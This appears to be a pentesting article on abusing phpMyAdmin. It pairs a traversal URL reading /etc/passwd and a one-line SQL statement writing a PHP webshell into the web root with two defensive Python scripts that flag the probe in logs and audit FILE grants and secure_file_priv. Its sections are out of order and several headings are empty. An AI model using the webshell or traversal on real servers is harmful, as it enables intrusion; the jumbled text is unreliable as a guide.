Phpmyadmin Hacktricks May 2026
Once you have a shell via phpMyAdmin:
Cross-Site Request Forgery can modify the server’s configuration, leading to RCE.
Unauthenticated local file inclusion → RCE (phpMyAdmin 4.8.0 – 4.8.1)
Check it live:
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd
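On the defending side, that request shape is easy to spot in web-server access logs. The following is an added example, not code from HackTricks or from the phpMyAdmin project: it scans constructed Apache combined-format log lines (addresses from RFC 5737 test ranges, timestamps invented) and flags any `target=` value that, after repeated percent-decoding, still contains a `?` (the allowlist bypass) or `..` (the traversal), and notes when the value was double-encoded so that a single decode would miss it.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format lines for illustration only (no real server, RFC 5737 addresses).
SAMPLE_LOG = """\
203.0.113.10 - - [12/May/2026:10:01:02 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "curl/8.4.0"
203.0.113.10 - - [12/May/2026:10:01:05 +0000] "GET /phpmyadmin/index.php?target=db_structure.php HTTP/1.1" 200 9023 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2026:10:02:11 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%3f/../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "python-requests/2.31"
192.0.2.5 - - [12/May/2026:10:03:30 +0000] "POST /phpmyadmin/import.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Pull the raw (still percent-encoded) target value out of the query string.
TARGET_RE = re.compile(r'(?:^|&)target=([^&]*)')


def fully_decode(value: str, max_rounds: int = 5):
    """Percent-decode until the string stops changing; return (decoded, rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_target(raw_target: str):
    """Return (decoded_value, reasons). An empty reasons list means the value looks benign."""
    decoded, rounds = fully_decode(raw_target)
    reasons = []
    if rounds >= 2:
        reasons.append("double-encoding")   # %253f -> %3f -> ? : layered to survive one decode
    if "?" in decoded:
        reasons.append("allowlist-bypass")  # an allowlisted prefix followed by '?' and an arbitrary path
    if ".." in decoded:
        reasons.append("traversal")         # directory traversal out of the phpMyAdmin tree
    return decoded, reasons


def scan_log(text: str):
    """Return one finding per request whose target parameter matches the probe pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = urlsplit(m.group("uri"))
        t = TARGET_RE.search(uri.query)
        if not t:
            continue
        decoded, reasons = inspect_target(t.group(1))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "path": uri.path,
                "target": t.group(1),
                "decoded": decoded,
                "reasons": reasons,
                "status": m.group("status"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} -> {f['decoded']}  [{', '.join(f['reasons'])}]")
```

The decode loop matters: a WAF or log rule that decodes once sees `db_sql.php%3f/...` and may let it through, while the second round exposes the `?` that defeats the allowlist. A 200 status on a flagged line is worth a closer look than a 404.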
To get RCE:
phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server.
In the spirit of HackTricks (the legendary repository for pentesting tricks), this article compiles the most effective techniques to abuse, bypass, and exploit phpMyAdmin installations.
Disclaimer: This article is for educational purposes and authorized security testing only. Unauthorized access to databases is illegal.
Example:
GRANT ALL PRIVILEGES ON *.* TO 'user'@'%';
Write a webshell:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
Requirements:
Check secure_file_priv:
SHOW VARIABLES LIKE "secure_file_priv";
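As a defensive counterpart to the two checks above, here is an added example (not code from the original article or from MySQL) that takes the value returned by SHOW VARIABLES LIKE "secure_file_priv" together with SHOW GRANTS output and reports which accounts hold the FILE privilege (directly or via ALL PRIVILEGES on *.*) and whether an INTO OUTFILE write could land under the web root. The variable value, the grant strings and the /var/www/html web root are constructed; the value semantics follow MySQL (NULL disables file import/export, an empty string leaves it unrestricted, a path confines it to that directory).

```python
import os
import re

# Constructed inputs: what SHOW VARIABLES LIKE "secure_file_priv" and SHOW GRANTS FOR <account>
# might return on a poorly configured server. Not taken from any real system.
SAMPLE_VARIABLES = {"secure_file_priv": ""}  # empty string = no restriction (MySQL semantics)
SAMPLE_GRANTS = {
    "'app'@'localhost'": ["GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'app'@'localhost'"],
    "'user'@'%'": ["GRANT ALL PRIVILEGES ON *.* TO 'user'@'%'"],
    "'backup'@'localhost'": ["GRANT SELECT, FILE ON *.* TO 'backup'@'localhost'"],
}

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s", re.IGNORECASE)


def classify_secure_file_priv(value):
    """MySQL semantics: NULL disables LOAD DATA / INTO OUTFILE, '' leaves them unrestricted, a path confines them."""
    if value is None or str(value).upper() == "NULL":
        return "disabled"
    if value == "":
        return "unrestricted"
    return "restricted"


def outfile_can_reach(value, directory):
    """Could a SELECT ... INTO OUTFILE write somewhere under `directory` with this secure_file_priv?"""
    state = classify_secure_file_priv(value)
    if state == "disabled":
        return False
    if state == "unrestricted":
        return True
    allowed = os.path.normpath(value)
    target = os.path.normpath(directory)
    # Writes are confined to `allowed`; the directory is exposed only if one contains the other.
    return target == allowed or target.startswith(allowed + os.sep) or allowed.startswith(target + os.sep)


def file_capable_accounts(grants):
    """Accounts whose global (*.*) grant includes FILE or ALL PRIVILEGES. FILE is a global privilege only."""
    capable = []
    for account, statements in grants.items():
        for stmt in statements:
            m = GRANT_RE.match(stmt.strip())
            if not m or m.group("scope") != "*.*":
                continue
            privs = {p.strip().upper() for p in m.group("privs").split(",")}
            if privs & {"FILE", "ALL PRIVILEGES", "ALL"}:
                capable.append(account)
                break
    return capable


def audit(variables, grants, webroot="/var/www/html"):
    """Combine both checks: file-capable accounts only matter if the file system is reachable."""
    value = variables.get("secure_file_priv")
    capable = file_capable_accounts(grants)
    reachable = outfile_can_reach(value, webroot)
    return {
        "secure_file_priv": classify_secure_file_priv(value),
        "outfile_to_webroot_possible": reachable,
        "file_capable_accounts": capable,
        "wildcard_host_accounts": [a for a in capable if a.endswith("@'%'")],
        "exposed": reachable and bool(capable),
    }


if __name__ == "__main__":
    for key, val in audit(SAMPLE_VARIABLES, SAMPLE_GRANTS).items():
        print(f"{key}: {val}")
```

The two settings have to be read together: a FILE-capable account is harmless while secure_file_priv is NULL, and an unrestricted secure_file_priv is harmless while no account can use it, so the audit only reports "exposed" when both conditions hold. Accounts with a '%' host are listed separately because they can be reached from any address that can speak to the server.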
If you're defending against these tricks:
